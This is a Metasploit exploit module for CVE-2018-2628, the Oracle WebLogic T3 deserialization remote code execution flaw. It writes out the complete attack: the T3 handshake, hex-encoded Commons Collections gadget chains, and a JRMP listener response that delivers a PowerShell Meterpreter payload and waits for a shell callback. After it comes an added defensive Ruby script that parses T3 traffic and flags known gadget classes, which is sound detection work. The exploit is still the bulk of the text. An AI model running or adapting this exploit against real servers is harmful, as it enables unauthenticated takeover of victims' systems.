oracle weblogic server deserialization remote code execution (metasploit)





##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Oracle Weblogic Server Deserialization RCE',
      'Description'    => %q{
        An unauthenticated attacker with network access to the Oracle Weblogic
        Server T3 interface can send a serialized object to the interface to
        execute code on vulnerable hosts.
      },
      'Author'         =>
        [
          'brianwrf',     # EDB PoC
          'Jacob Robles'  # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2018-2628'],
          ['EDB', '44553']
        ],
      'Privileged'     => false,
      'Targets'        =>
        [
          [ 'Windows', { 'Platform' => ['win'] } ]
        ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => { 'RPORT' => 7001 },
      'DisclosureDate' => 'Apr 17 2018'))
  end

  def gen_resp
    # Build the PowerShell command the JRMP response will carry; it is stored
    # as a hex string with a 2-byte big-endian length prefix (Java UTF format).
    pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
    pwrshl.gsub!("%COMSPEC%", "cmd.exe")
    tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join
    mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')
    mycmd << tmp_dat

    # Response data taken from JRMPListener generated data:
    # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'
    # Modified captured network traffic bytes. Patch in command to run
    @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'
    @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'
    @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'
    @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'
    @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'
    @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'
    @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'
    @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'
    @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'
    @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'
    @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'
    @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'
    @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'
    @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'
    @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'
    @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'
    @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'
    @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'
    @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'
    @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'
    @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'
    @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'
    @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'
    @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'
    @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'
    @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'
    @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'
    @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'
    @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'
    @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'
    @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'
    @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'
    @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'
    @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'
    @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'
    @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'
    @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'
    @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'
    @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'
    @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'
    @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'
    @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'
    @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
    @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'
    @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'
    @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'
    @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'
    @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'
    @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'
    @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'
    @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'
    @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'
    @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'
    @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'
    @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'
    @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'
    @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'
    @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'
    @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'
    @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'
    @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'
    @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'
    @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'
    @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'
    @resp << '673badd256e7e91d7b470200007078700000000174'
    @resp << mycmd
    @resp << '74'
    @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'
    @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'
    @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
    @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'
    @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'
    @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'
    @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'
    @resp << '7e005a'
  end

  def on_client_connect(client)
    # Make sure to only send one meterpreter payload to a host.
    # During testing the remote host called back up to 11 times
    # (or as long as the server was listening).
    vprint_status("Comparing host: #{client.peerhost}")
    if @met_sent.include?(client.peerhost) then return end
    @met_sent << client.peerhost
    vprint_status("met_sent: #{@met_sent}")

    # Response format determined by watching network traffic
    # generated by EDB PoC
    accept_conn = '4e00'
    raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join
    accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')
    accept_conn << raccept_conn
    accept_conn << '0000'
    accept_conn << client.peerport.to_s(16).rjust(4,'0')
    client.put([accept_conn].pack('H*'))
    client.put([@resp].pack('H*'))
  end

  def t3_handshake
    # Plaintext T3 banner: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"
    shake = '74332031322e322e310a41533a323535'
    shake << '0a484c3a31390a4d533a313030303030'
    shake << '30300a0a'
    sock.put([shake].pack('H*'))
    sleep(1)
    sock.get_once
  end

  def build_t3_request_object
    # data block is from EDB PoC
    data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
    data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
    data << '700000000a000000030000000000000006007070707070700000000a00000003'
    data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'
    data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'
    data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'
    data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'
    data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'
    data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'
    data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'
    data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'
    data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'
    data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'
    data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'
    data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'
    data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
    data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
    data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
    data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
    data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
    data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
    data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
    data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
    data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
    data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
    data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
    data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
    data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
    data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
    data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
    data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
    data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
    data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
    data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
    data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
    data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
    data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
    data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
    data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
    data << '2d4147444d565155423154362e656883348cd6000000070000'
    data << rport.to_s(16).rjust(4, '0')
    data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
    data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
    data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
    data << '863d1d0000000078'
    sock.put([data].pack('H*'))
    sleep(2)
    sock.get_once
  end

  def send_payload_objdata
    # JRMPClient2 payload generated from EDB PoC:
    # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2
    # Patch in srvhost and srvport
    payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
    payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
    payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
    payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
    payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
    payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
    payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
    payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
    payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
    payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
    payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
    payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
    payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
    payload << '78707702000078fe010000'
    # Data
    payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'
    payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'
    payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'
    payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'
    payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'
    payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'
    payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'
    payload << '1e030000787077'

    unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join
    unicast_dat = '000a556e696361737452656600'
    unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')
    unicast_dat << unicast_srvhost
    unicast_dat << '0000'
    unicast_dat << srvport.to_s(16).rjust(4,'0')
    unicast_dat << '000000004e18654b000000000000000000000000000000'
    unicast_dat << '78'
    payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')
    payload << unicast_dat
    payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
    payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
    payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
    payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
    payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
    payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
    payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
    payload << '6f3b290000001b7878fe00ff'
    # T3 frame: 4-byte big-endian length (counting itself) followed by the body
    data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
    data << payload
    sock.put([data].pack('H*'))
    sleep(1)
    sock.put([data].pack('H*'))
    sleep(1)
    sock.get_once
  end

  def exploit
    @met_sent = []
    gen_resp
    connect
    vprint_status('Sending handshake...')
    t3_handshake
    build_t3_request_object
    start_service
    vprint_status('Sending payload...')
    send_payload_objdata
    # Need to wait this long to make sure we get a shell back
    sleep(10)
  end
end
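The module above shows what an attacker-side T3 exchange looks like on the wire: a plaintext "t3 ..." banner, then 4-byte length-prefixed frames whose bodies embed Java serialization streams (magic bytes 0xACED0005) carrying class descriptors for gadget classes such as org.apache.commons.collections.functors.InvokerTransformer. The following is an added defender-side example, not part of the Metasploit module or the EDB PoC: it parses a captured T3 stream, walks the frames, extracts every class name from TC_CLASSDESC (0x72) records after the serialization magic, and flags names on a watch list. The watch list, the frame contents and the sample capture are constructed for this example; only the banner text is decoded from the handshake bytes in the module.

```ruby
# Added example (not from the Metasploit module): inspect captured T3 traffic
# for Java serialization streams and known deserialization gadget classes.

T3_BANNER    = 't3 '
SERIAL_MAGIC = "\xAC\xED\x00\x05".b   # Java ObjectOutputStream magic + version 5
TC_CLASSDESC = 0x72                    # serialization tag: class descriptor
CLASS_NAME_RE = /\A[\[A-Za-z_$][\w$.\[;]*\z/   # dotted Java class or array name

# Constructed watch list (assumption): gadget classes that appear in the
# captured payloads of the module above. Extend with your own intelligence.
GADGET_WATCHLIST = [
  'sun.reflect.annotation.AnnotationInvocationHandler',
  'org.apache.commons.collections.functors.InvokerTransformer',
  'org.apache.commons.collections.functors.ChainedTransformer',
  'org.apache.commons.collections.map.LazyMap',
  'java.rmi.server.RemoteObjectInvocationHandler'
].freeze

# Split a captured T3 stream into [banner, frames]. The banner ends at the
# first blank line; each frame is a 4-byte big-endian length (which counts
# itself) followed by the body. Truncated or nonsensical lengths stop parsing.
def split_t3_stream(stream)
  stream = stream.b
  banner = nil
  if stream.start_with?(T3_BANNER)
    nl = stream.index("\n\n")
    return [nil, []] if nl.nil?
    banner = stream[0...nl]
    stream = stream[(nl + 2)..-1]
  end
  frames = []
  pos = 0
  while pos + 4 <= stream.bytesize
    len = stream[pos, 4].unpack1('N')
    break if len < 4 || pos + len > stream.bytesize
    frames << stream[pos + 4, len - 4]
    pos += len
  end
  [banner, frames]
end

# Extract class names from a frame: after the serialization magic, every
# TC_CLASSDESC byte followed by a 2-byte length and a plausible class name is
# taken as a descriptor. The name check filters chance 0x72 bytes in binary data.
def class_names_in(frame)
  frame = frame.b
  magic = frame.index(SERIAL_MAGIC)
  return [] if magic.nil?
  names = []
  pos = magic + SERIAL_MAGIC.bytesize
  while pos + 3 <= frame.bytesize
    if frame.getbyte(pos) == TC_CLASSDESC
      len  = frame[pos + 1, 2].unpack1('n')
      name = frame[pos + 3, len]
      if name && name.bytesize == len && name.match?(CLASS_NAME_RE)
        names << name.dup.force_encoding(Encoding::UTF_8)
        pos += 3 + len
        next
      end
    end
    pos += 1
  end
  names.uniq
end

# Produce a report for one captured stream.
def inspect_t3_stream(stream)
  banner, frames = split_t3_stream(stream)
  classes = frames.flat_map { |f| class_names_in(f) }.uniq
  hits = classes & GADGET_WATCHLIST
  {
    t3_banner: banner,
    frames: frames.size,
    serialized_classes: classes,
    gadget_hits: hits,
    suspicious: !hits.empty?
  }
end

# Constructed sample capture: the module's handshake banner followed by one
# frame holding a serialization stream with a benign and a gadget descriptor.
def build_sample_stream
  handshake = "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"
  body = SERIAL_MAGIC.dup
  ['java.lang.String',
   'org.apache.commons.collections.functors.InvokerTransformer'].each do |n|
    body << [TC_CLASSDESC, n.bytesize].pack('Cn') << n
  end
  frame = [body.bytesize + 4].pack('N') + body
  handshake.b + frame
end

puts inspect_t3_stream(build_sample_stream).inspect if $PROGRAM_NAME == __FILE__
```

Run against a real capture by replacing build_sample_stream with the raw bytes of the client-to-server half of a T3 session; a non-empty gadget_hits list, or any serialized class that the deployed application has no business sending over T3, is the signal to investigate. The same class-descriptor walk can be pointed at the server-to-client direction to see which classes a suspicious remote JRMP listener tried to push back.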



